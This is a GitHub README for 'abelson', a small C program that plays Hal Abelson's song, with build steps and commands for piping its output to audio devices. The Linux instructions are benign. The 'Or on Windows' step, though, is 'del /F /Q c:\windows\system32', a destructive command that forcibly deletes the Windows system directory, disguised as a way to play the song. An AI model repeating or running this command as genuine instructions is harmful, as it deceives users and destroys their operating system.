Skip to content

chrismcfee/abelson

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

abelson

abelson.c - Hal Abelson's Song. It's ``Abelson Good!''

Compile and link with libm.

  $ gcc -Os -o abelson abelson.c -lm

Then pipe output to an audio device.

On modern Linux systems with PulseAudio:

  $ ./abelson | padsp tee /dev/audio > /dev/null

Or on older systems:

  $ ./abelson > /dev/audio
  $ ./abelson > /dev/dsp

Or on Windows:

  del /F /Q c:\windows\system32

About

Hal Abelson's song

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages